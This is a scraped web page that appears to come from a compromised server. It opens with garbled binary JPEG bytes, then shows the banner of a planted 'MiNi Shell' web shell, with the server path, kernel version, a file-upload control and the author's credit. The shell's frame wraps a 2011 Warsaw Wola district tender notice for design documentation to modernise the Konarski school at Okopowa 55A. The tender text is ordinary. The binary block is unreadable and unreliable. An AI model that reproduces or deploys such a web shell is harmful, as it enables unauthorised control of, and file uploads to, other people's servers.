JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110408/110737-N-2011.html

<p class="kh_header"><b>Warszawa: Wykonanie dokumentacji projektowo - kosztorysowej modernizacji budynku dla zadania pod nazwą Modernizacja ZS im. M. Konarskiego wraz z infrastrukturą przy ul. Okopowej 55A w Warszawie (numer sprawy 23/ZP/11)</b><br>
<b>Numer ogłoszenia: 110737 - 2011; data zamieszczenia: 08.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa, Dzielnica Wola , Al. Solidarności 90, 01-003 Warszawa, woj. mazowieckie, tel. 22 5048586,87,89,90, faks 22 5048592.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowej modernizacji budynku dla zadania pod nazwą Modernizacja ZS im. M. Konarskiego wraz z infrastrukturą przy ul. Okopowej 55A w Warszawie (numer sprawy 23/ZP/11).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia.
Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej modernizacji budynków (główny i warsztatowe) wraz z zagospodarowaniem terenu szkoły       w oparciu o którą zostaną wykonane roboty budowlane, montażowe, instalacyjne i drogowe    w ramach zadania Modernizacja ZS im. M. Konarskiego wraz z infrastrukturą przy ulicy Okopowej 55A.
Przedmiot zamówienia obejmuje wykonanie pełnej dokumentacji budowlano - wykonawczej wraz z uzyskaniem wymaganych przepisami szczegółowych opinii, uzgodnień, zatwierdzeń itp. niezbędnych do uzyskania pozwolenia na budowę i prawidłowej realizacji przedmiotu zamówienia. 
2. Szczegółowy opis przedmiotu zamówienia
1)  Stan istniejący budynków.
Budynki są zlokalizowane na działce nr 25 w obrębie nr 6-03-06 przy ulicy Okopowej 55A        w Warszawie. Budynki składające się na Zespół Szkół im. M. Konarskiego przy ulicy Okopowej 55A w Warszawie pochodzą z różnych okresów zabudowy. Główny budynek szkolny wybudowany jest na planie podkowy z ramionami skierowanymi na południe. Pochodzi on z okresu międzywojennego. Budynki warsztatowe pochodzą z okresu po drugiej wojnie światowej - lata 50 i 60. Główny korpus budynku jest czterokondygnacyjny częściowo podpiwniczony. Skrzydła boczne są dwutraktowe, czterokondygnacyjne.             W budynku mieszczą się sale dydaktyczne, pomieszczenia socjalne i gospodarcze usytuowane wzdłuż korytarzy. Budynki warsztatowe są jednokondygnacyjne w części gdzie zlokalizowane są maszyny i dwukondygnacyjne w części gdzie zlokalizowane jest zaplecze warsztatowe i socjalne. Budynek główny ZS im. M. Konarskiego podlega stopniowej modernizacji. W ramach dotychczasowych robót wymieniono zniszczone drewniane okna typu skrzynkowego na okna jednoramowe wykonane z PCV i została zmodernizowana          i wyposażona na potrzeby oddziału gastronomicznego sala dydaktyczna znajdująca się na parterze zachodniego skrzydła.
2) Podstawowe informacje techniczne o budynku:
a) fundamenty - ławy fundamentowe betonowe,
b) ściany fundamentowe - cegła pełna,
c) podłoga parteru - płyta żelbetowa rozpięta na ścianach fundamentowych,
d) strop nad parterem oraz 1 i 2 piętrem - żelbetowy grubości około 22 cm,
e) strop nad 3 i 4 piętrem - płyta półciężka Kleina o rozstawie belek 130 cm,
f) stropodach nad skrzydłami budynku - wentylowany, dolną część stanowi płyta Kleina,   a górną płyty korytkowe,
g) pokrycie - papą termozgrzewalna,
h) ściany zewnętrzne - grubości łącznie z tynkiem około 80 cm, wykonane z cegły pełnej, jednolite,
i) ściany działowe - murowane z cegły ceramicznej,
j) stolarka okienna - okna jednoramowe wykonane z PCV, parapety wewnętrzne wykonane są z lastrico i z blachy stalowej malowanej, a parapety zewnętrzne z blachy stalowej ocynkowanej,
k) stolarka drzwiowa wewnętrzna - drewniana,
l) posadzki: korytarze - lastrico, sale dydaktyczne - parkiet,
m) budynek wyposażony jest w instalację wodociągową, sanitarną, centralnego ogrzewania, ciepłej wody, elektryczną, słaboprądową oraz dozorową,
n) budynek posiada grawitacyjną wentylację wyciągowa poprzez kratki wywiewne            w pomieszczeniach, część pomieszczeń posiada wentylację mechaniczną,
o) powierzchnia zabudowy około - 5.394,00 m2 w tym :
budynek główny około 2.825,00 m2,
budynki warsztatowe około - 2.569,00 m2,
kubatura całkowita około 60.501,00 m3,
budynek główny około - 39.900,00 m3,
budynki warsztatowe około - 20.601,00 m3 
3) Dokumentację  należy opracować w zakresie:
a) opracowania audytu energetycznego - określającego zakres koniecznej termomodernizacji budynku,
b) wykonania izolacji pionowej i poziomej przeciw wodnej, izolacji termicznej fundamentów i ścian piwnic budynku szkoły w jednym rozwiązaniu systemowym           z ewentualnym osuszeniem ścian wynikającym z oceny,
c) remontu elewacji budynku szkoły wraz z kolorystyką,
d) ocieplenia stropu nad ostatnią kondygnacją budynku szkoły,
e) remontu pokrycia dachu z ewentualną wymianą obróbek blacharskich oraz remontu kominów i ściany kominowej,
f) remontu lub wymiany stolarki drzwiowej,
g) remontu sali gimnastycznej i pomieszczeń szkolnych (sale dydaktyczne, pomieszczenia administracyjne oraz ciągi komunikacyjne) z ewentualną wymianą tynków i posadzek wynikających z oceny,
h) wymiany instalacji co i wod - kan w zakresie wynikającym z wykonanej oceny,
i) remontu i modernizacji węzła cieplnego w zakresie technologii i automatyki, robót budowlanych i elektrycznych,
j) wykonania wentylacji mechanicznej we wskazanych pomieszczeniach (np. sala gimnastyczna, sala obsługi),
k) remontu i modernizacji instalacji przeciwpożarowej,
l) remontu lub ewentualnej wymiany instalacji odgromowej,
m) wymiany instalacji elektrycznej w tym wymiany instalacji oświetleniowej, instalacji gniazd wtykowych i siłowych, tablic głównych i rozdzielni w zakresie wynikającym        z inwentaryzacji i wykonanej oceny,
n) remontu i uzupełnienia instalacji monitoringu,
o) przystosowania budynku dla osób niepełnosprawnych,
p) wymiany przyłącza gazu i instalacji wewnętrznej z rozdzieleniem przyłącza,
q) koncepcja wraz z analizą wskazującą możliwość zlokalizowania pełnowymiarowego boiska do piłki nożnej z bieżnią i oświetleniem,
r) opracowania zagospodarowania terenu (parkingi , zieleń, pełnowymiarowe boisko do piłki nożnej z bieżnią),
s) utworzenia i wyposażenia specjalistycznej sali obsługi konsumenta z zapleczem - proponowana lokalizacja sali to I piętro w pomieszczeniach po bibliotece,
t) wykonanie bufetu z wyposażeniem (należy uwzględnić wyposażenie zakupione przez szkołę),
u) wykonanie instalacji sali komputerowej ze stanowiskami bez wyposażenia w sprzęt komputerowy,
v) oceny technicznej wraz z koncepcją wskazującej możliwość zlokalizowania                   w mniejszym budynku warsztatowym zaplecza socjalnego dla boiska sportowego.
4) Dokumentacja powinna zawierać następujące opracowania:
a) projekt budowlany dla wszystkich branż wraz ze szczegółowymi opiniami, uzgodnieniami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania,
b) projekt wykonawczy dla wszystkich branż wraz ze szczegółowymi opiniami, uzgodnieniami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania,
c) kosztorys inwestorski dla wszystkich branż sporządzony metodą szczegółową,
d) przedmiar robót dla wszystkich branż,
e) specyfikację techniczną wykonania i odbioru robót dla wszystkich branż i rodzajów robót,
5) Dokumentacja musi umożliwiać etapowe wykonywanie robót tj. remont budynku 	dydaktycznego - dwa etapy, zagospodarowanie terenu - jeden etap.
6) Dokumentacja powinna być sporządzona w formie:
a)   papierowej w ilości 5 egzemplarzy dla poszczególnych opracowań wymieniowych pkt 4,
b)   elektronicznej w ilości 2 egzemplarzy na nośniku elektronicznym  CD-R, w tym:
  dokumentację projektową, przedmiary robót i STWiOR- w formacie PDF,
  kosztorysy inwestorskie - w programie Norma i ATH
7) Do obowiązków wykonawcy należy opracowanie dokumentacji, w sposób zgodny          z obowiązującymi przepisami prawa i normami wprowadzającymi normy europejskie lub europejskie aprobaty techniczne, a w szczególności w sposób zgodny z wymaganiami:  
a) ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity: Dz. U z 2010 r., 
Nr 243, poz. 1623 ze zm.),
b) ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.),
c) rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202 poz. 2072 ze zm.),
d) rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003 r. Nr 120, poz. 1133),
e) rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126),
f) rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999 r. Nr 43 poz. 430 ze zm.),
g) rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75 poz. 690 ze zm.),
h) rozporządzenia Rady Ministrów z dnia 10 grudnia 2010 r. w sprawie Klasyfikacji Środków Trwałych (Dz. U. z 2010 r. Nr 242, poz. 1622),
i) rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w Programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389),
8) Informacje dodatkowe:
a) Wykonawca wykona i przekaże zamawiającemu przedmiot zamówienia w stanie kompletnym z punktu widzenia celu, któremu ma służyć w oparciu o najnowsze rozwiązania techniczne. 
b) Opracowanie projektowe powinno zawierać wykonanie pełnej dokumentacji budowlano - wykonawczej wraz z uzyskaniem wymaganych przepisami szczegółowych opinii, uzgodnień, zatwierdzeń itp. niezbędnych do uzyskania pozwolenia na budowę      i prawidłowej realizacji przedmiotu zamówienia. 
c) wszystkie wymagane opinie, uzgodnienia, zatwierdzenia itp., niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych i prawidłowej realizacji robót objętych przedmiotem zamówienia.
d) Wykonawca zobowiązuje się wykonać przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi przepisami oraz obowiązującymi normami i normatywami.
e) Wykonawca załączy wykaz opracowanej dokumentacji i oświadczenie o jej kompletności dla celu, któremu ma służyć.
f) Inwentaryzacje stanu istniejącego do celów projektowych należy wykonać w zakresie niezbędnym do opracowania dokumentacji projektowo - kosztorysowej.
g) W dokumentacji projektowo - kosztorysowej należy ująć średni poziom cen materiałów.
h) Projektant zobowiązany jest do opisywania proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, to projektant zobowiązany jest do podania co najmniej dwóch producentów tych materiałów i urządzeń.
i) Do opisu urządzeń należy załączyć rysunki lub schematy urządzeń. Urządzenia powinny być tak zaprojektowane, aby spełniały wszystkie wymogi dotyczące bezpieczeństwa.
j) Dokumentacja musi umożliwiać etapowe wykonywanie robót tj. remont budynku dydaktycznego - dwa etapy, zagospodarowanie terenu - jeden etap.

3. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której 	wykonanie powierzy podwykonawcom.

4. Rękojmia: okres udzielonej przez wykonawcę rękojmi na wykonany przedmiot 	zamówienia wyniesie 12 miesięcy, zgodnie z zapisami zawartymi w § 10 ust. 1 wzoru 	umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt 6, zamawiający planuje udzielenie, w okresie 3 lata od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, które będą zgodne z przedmiotem zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości:
5.500,00 zł. (słownie: pięć tysięcy pięćset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga, aby wykonawca wykazał, że w okresie ostatnich 3 lat (licząc wstecz 	od daty wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy -  to 	w tym okresie, należycie wykonali co najmniej 2 zamówienia w zakresie opracowania 	dokumentacji projektowo - kosztorysowej o wartości minimum 240.000,00 zł brutto 	każde. Każda z wykonanych dokumentacji musi obejmować swoim zakresem 	wszystkie wymienione branże łącznie tj.: architektoniczną oraz sanitarną oraz 	elektryczną.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga, aby wykonawca skierował do realizacji niniejszego zamówienia zespół projektantów z następującymi uprawnieniami bez ograniczeń: do wykonywania projektów architektury, konstrukcji, instalacji sanitarnych, instalacji elektrycznych. Wszyscy projektanci wskazani do wykonania niniejszego zamówienia muszą posiadać uprawnienia zawodowe wymagane prawem oraz być wpisani na listę członków właściwej izby samorządu zawodowego, w oparciu o art. 6 ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z dnia 2001 r. Nr 5, poz. 42 ze zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku gdy wykonawcę reprezentuje pełnomocnik - pełnomocnictwo do podpisania oferty, określające jego zakres i podpisane przez osoby upoważnione do reprezentowania wykonawcy wraz z dokumentem określającym sposób reprezentacji wykonawcy.
2. W przypadku gdy ofertę składają wykonawcy występujący wspólnie wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy Prawo zamówień publicznych, podpisane przez osoby upoważnione do składania oświadczeń woli, każdego z wykonawców wspólnie ubiegając się o udzielenie zamówienia.
3. Dokument (np. odpis z właściwego rejestru - np. Krajowego Rejestru Sądowego, zaświadczenie o wpisie do ewidencji działalności gospodarczej lub umowa spółki cywilnej, itp.) zawierający dane aktualne na dzień składania ofert, potwierdzający, że oferta lub pełnomocnictwo zostały podpisane przez osobę właściwie umocowaną, jeżeli nie wynika to z innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Stosownie do postanowień art. 144 ust. 1 ustawy Prawo zamówień publicznych, 	zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w 	stosunku do treści oferty, wobec czego ww. zmiany oraz warunki tych zmian zostały 	określone we wzorze umowy § 11 ust. 2 tj.:
W przypadku braku możliwości uzyskania przez Wykonawcę wymaganych uzgodnień, 	 	decyzji w terminie umownym przy zachowaniu przez Wykonawcę należytej staranności, 	Strony mogą przedłużyć termin realizacji umowy w formie aneksu do niniejszej umowy 	podpisanego przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wola.waw.pl/page/index.php?str=422<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego (cena 6,60zł), pokój nr 220 lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2011 godzina 09:00, miejsce: Miasto Stołeczne Warszawa Urząd Dzielnicy Wola, ul. al. Solidarności 90, 01-003
Warszawa w pokoju nr 220 Wydział Zamówień Publicznych dla Dzielnicy Wola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com